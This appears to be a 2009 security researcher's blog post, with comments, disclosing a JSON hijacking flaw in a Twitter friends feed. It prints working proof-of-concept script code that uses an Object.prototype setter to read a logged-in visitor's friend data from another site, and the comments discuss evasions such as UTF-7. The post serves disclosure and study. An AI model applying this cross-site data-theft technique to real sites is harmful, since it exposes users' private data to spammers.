I did report this to Twitter a few weeks ago, but now that Chris Heilmann has let the cat out of the bag I’ll post my repro now. Basically Twitter JSON security is leaking data, the JSON feeds that are publically available shouldn’t be IMO or at least protected using known methods.
So if you use Twitter a web site can know who you are and who your friends are. Spammers could you this data to automate targeted spamming attacks or maybe automated social engineering, you’re more like to open a email attachment off your friends right?
The attack works by including the JSON data using a script tag on any web site, using setters you can get the data of the JSON feed in every browser except IE (in my testing).
<script>
Object.prototype.__defineSetter__('user',function(obj){for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script defer="defer" src=https://twitter.com/statuses/friends_timeline/>
</script>
Originally I thought it was a bug in Firefox, that’s why I’ve used Object.prototype and not simply Object but I found a post by Joe Walker which uses a far better technique to grab all the data.
Here is the proof of concept to prove I do know what your friends did last summer:-
twitter json hack
Comments 12
how about document.write() instead of alert() for your PoC?
Posted 07 Jan 2009 at 5:23 pm ¶LOL nah I like annoying people
plus I can’t be bothered changing it now
Posted 07 Jan 2009 at 5:36 pm ¶* Note You need to be logged into twitter using https in order for the POC to work correct
Posted 07 Jan 2009 at 5:38 pm ¶Twitter has now fixed the problem whoo hoo
Posted 13 Jan 2009 at 9:19 am ¶Get NoScript 1.8.8.95 from http://noscript.net/getit#devel
http://hackademix.net/2009/01/13/you-dont-know-what-my-twitter-leaks/
http://hackademix.net/2009/01/13/twitter-json-hijacking-updates/
Posted 13 Jan 2009 at 10:34 am ¶Hi Gareth
Posted 26 Feb 2009 at 9:29 am ¶I found your name and information on the Security Planet website. Can you help me, or do you know someone who can help me, to crack a gmail password?
Thanks
Pete
@Pete
I think you misunderstood what I actually do. I’m a security researcher.
Posted 26 Feb 2009 at 9:52 am ¶I had to have a chuckle at Petes comment! Cheered me right up!
Posted 21 May 2009 at 4:23 pm ¶It seems that doesn’t work in ff 3.5 because setters are ignored when initializing object. Any ideas how to evade that?
Posted 21 Dec 2009 at 11:45 am ¶@carstein
UTF-7 should work until they fix it
Posted 21 Dec 2009 at 1:13 pm ¶@Gareth:
I don’t think I follow you. UTF-7 where?
The problem is, that in FF3 you can define Setter for an Object.prototype which gets invoked when you recived JSON object (as a JS, so Object() is being initialized). However, due to tweaks in FF3.5 setters are only called when the value is begin set to an existing object, but not during initialization (so it spoils all the joy of JSON hijack).
Posted 21 Dec 2009 at 1:42 pm ¶@carstein
I do follow honest but if you used poisoned UTF-7 data with a json request then you can get most of the data by manipulating the javascript. See my CSP hack.
http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/
Posted 22 Dec 2009 at 10:44 am ¶Post a Comment